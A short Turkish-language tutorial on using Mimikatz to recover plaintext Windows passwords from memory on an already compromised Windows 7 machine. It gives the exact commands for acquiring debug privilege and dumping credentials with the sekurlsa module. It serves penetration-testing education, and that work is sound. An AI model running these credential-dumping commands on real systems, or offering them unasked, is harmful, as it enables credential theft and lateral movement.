WCE ve Mimikatz araçları temel olarak RAM üzerinde bulunan kimlik doğrulama paketlerindeki (authentication packages) kimlik bilgilerini (şifreli parola ve parola özetlerini, kullanıcı adı gibi) okur, parolayı (ve MSV1_0.dll için parola özetini) şifreleyen şifreleme anahtarını elde eder. Sonrasında ise, şifreli kimlik bilgilerini çözer (deşifre eder). Bu yazıda, ele geçirilmiş olan Windows 7 64 bit bir bilgisayar için parolanın açık hali elde edilecektir.
Mimikatz aracının son sürümü http://blog.gentilkiwi.com/mimikatz adresindeki Github bağlantısından elde edilebilir. 64 bitlik Windows 7 işletim sisteminde, RAM üzerinde kayıtlı parolaların açık halini elde etmek için, yönetici hakları ile çalıştırılan komut satırında başlatılan Mimikatz aracına Debug yetkisi verilir. Sonrasında da SSP değeri ile çalıştırılır.
C:\Users\Kerem\Desktop\mimikatz_trunk\x64
mimikatz.exe
privilege::debug
sekurlsa::wdigest
Tüm SSP değerleri için parolalar elde edilmek isteniyorsa, “sekurlsa::logonPasswords all” komutu kullanılır.
Tek bir satırda mimikatz aracını çalıştırmak için, her bir komut tırnak işaretleri arasında parametre olarak verilebilir.
mimikatz.exe “privilege::debug” “sekurlsa::logonPasswords full” “exit”
İlk 2 parametre çalıştıktan sonra, “exit” parametresi ile Mimikatz kabuğundan otomatik olarak çıkıldığı görülmektedir: